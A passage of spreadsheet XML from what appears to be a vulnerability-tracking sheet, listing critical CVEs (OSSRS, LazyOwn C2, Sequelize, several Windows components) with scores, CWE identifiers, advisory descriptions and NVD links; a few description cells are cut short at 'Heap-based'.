      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68004</t>
        </is>
      </c>
      <c r="C194" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D194" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E194" s="5" t="inlineStr"/>
      <c r="F194" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L194" s="5" t="inlineStr">
        <is>
          <t>An issue in OSSRS SRS (Simple Realtime Server) &lt;v5.0.213 allows a remote attacker to execute arbitrary code via RTMP publish authorization, vhost-level security configuration (security.enabled), SrsSecurity::check(), trunk/src/app/srs_app_security.cpp, and SRS RTMP listener components</t>
        </is>
      </c>
      <c r="M194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68004</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68502</t>
        </is>
      </c>
      <c r="C195" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D195" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E195" s="5" t="inlineStr"/>
      <c r="F195" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L195" s="5" t="inlineStr">
        <is>
          <t>LazyOwn RedTeam/APT Framework is an AI-powered C2 and red-team operations framework. Prior to 0.2.154, LazyOwn's lazyc2.py registers an unauthenticated Socket.IO input event handler that dispatches data.get('value') to LazyOwnShell.one_cmd, reaching LazyOwnShell.do_cmd and subprocess.call(command, shell=True), allowing unauthenticated remote code execution in the C2 process. This issue is fixed in 0.2.154.</t>
        </is>
      </c>
      <c r="M195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68502</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68503</t>
        </is>
      </c>
      <c r="C196" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D196" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E196" s="5" t="inlineStr"/>
      <c r="F196" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="L196" s="5" t="inlineStr">
        <is>
          <t>LazyOwn RedTeam/APT Framework is an AI-powered C2 and red-team operations framework. Prior to 0.2.154, LazyOwn ships default C2 credentials LazyOwn and LazyOwn in payload.json and core/payload_schema.py and passes them unchanged to lazyc2.py HTTP Basic authentication, allowing any network-reachable attacker who knows the defaults to authenticate to the C2 dashboard with operator-level access. This issue is fixed in 0.2.154.</t>
        </is>
      </c>
      <c r="M196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68503</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68839</t>
        </is>
      </c>
      <c r="C197" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D197" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E197" s="5" t="inlineStr"/>
      <c r="F197" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G197" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L197" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69240</t>
        </is>
      </c>
      <c r="C198" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D198" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E198" s="5" t="inlineStr"/>
      <c r="F198" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G198" s="5" t="inlineStr">
        <is>
          <t>oracle, node.js</t>
        </is>
      </c>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L198" s="5" t="inlineStr">
        <is>
          <t>Sequelize is a Node.js ORM tool. Prior to 6.37.4, SQL injection is possible with strings only if dialect is set to oracle. The escape function defined in sql-string.js does not escape quotes if the value starts with TO_TIMESTAMP or TO_DATE. In the Oracle dialect, when val is a string and starts with TO_TIMESTAMP or TO_DATE, escape returns val directly instead of replacing single quotes. An attacker can inject arbitrary SQL expressions through an application value that reaches this escape path. This issue is fixed in version 6.37.4.</t>
        </is>
      </c>
      <c r="M198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69240</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69276</t>
        </is>
      </c>
      <c r="C199" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D199" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E199" s="5" t="inlineStr"/>
      <c r="F199" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G199" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="L199" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft UxTheme Library (uxtheme.dll) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69276</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69408</t>
        </is>
      </c>
      <c r="C200" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D200" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E200" s="5" t="inlineStr"/>
      <c r="F200" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G200" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L200" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69408</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69431</t>
        </is>
      </c>
      <c r="C201" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D201" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E201" s="5" t="inlineStr"/>
      <c r="F201" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L201" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69431</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69463</t>
        </is>
      </c>
      <c r="C202" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D202" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E202" s="5" t="inlineStr"/>
      <c r="F202" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G202" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L202" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69463</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69491</t>
        </is>
      </c>
      <c r="C203" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D203" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E203" s="5" t="inlineStr"/>
      <c r="F203" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G203" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L203" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Microsoft DirectMusic allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69491</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69493</t>
        </is>
      </c>
      <c r="C204" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D204" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E204" s="5" t="inlineStr"/>
      <c r="F204" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G204" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L204" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69493</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69496</t>
        </is>
      </c>
      <c r="C205" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D205" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E205" s="5" t="inlineStr"/>
      <c r="F205" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G205" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L205" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Compressed Folder allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69496</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69525</t>
        </is>
      </c>
      <c r="C206" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D206" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E206" s="5" t="inlineStr"/>
      <c r="F206" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G206" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J206" s="5" t="inlineStr"/>
      <c r="K206" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L206" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69525</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69579</t>
        </is>
      </c>
      <c r="C207" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D207" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E207" s="5" t="inlineStr"/>
      <c r="F207" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G207" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L207" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69579</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69586</t>
        </is>
      </c>
      <c r="C208" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D208" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E208" s="5" t="inlineStr"/>
      <c r="F208" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G208" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L208" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows PDF allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69586</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69590</t>
        </is>
      </c>
      <c r="C209" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D209" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E209" s="5" t="inlineStr"/>
      <c r="F209" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G209" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L209" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="M209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69590</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69595</t>
        </is>
      </c>
      <c r="C210" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D210" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E210" s="5" t="inlineStr"/>
      <c r="F210" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G210" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L210" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69595</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69715</t>
        </is>
      </c>
      <c r="C211" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D211" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E211" s="5" t="inlineStr"/>
      <c r="F211" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G211" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L211" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Direct Show allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69715</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69730</t>
        </is>
      </c>
      <c r="C212" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D212" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E212" s="5" t="inlineStr"/>
      <c r="F212" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G212" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L212" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69730</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69768</t>
        </is>
      </c>
      <c r="C213" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D213" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E213" s="5" t="inlineStr"/>
      <c r="F213" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G213" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L213" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69768</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69769</t>
        </is>
      </c>
      <c r="C214" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D214" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E214" s="5" t="inlineStr"/>
      <c r="F214" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G214" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L214" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69769</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69819</t>
        </is>
      </c>
      <c r="C215" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D215" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E215" s="5" t="inlineStr"/>
      <c r="F215" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J215" s="5" t="inlineStr"/>
      <c r="K215" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L215" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in RPC Runtime allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69819</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69824</t>
        </is>
      </c>
      <c r="C216" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D216" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E216" s="5" t="inlineStr"/>
      <c r="F216" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G216" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="L216" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69824</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69829</t>
        </is>
      </c>
      <c r="C217" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D217" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E217" s="5" t="inlineStr"/>
      <c r="F217" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G217" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L217" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
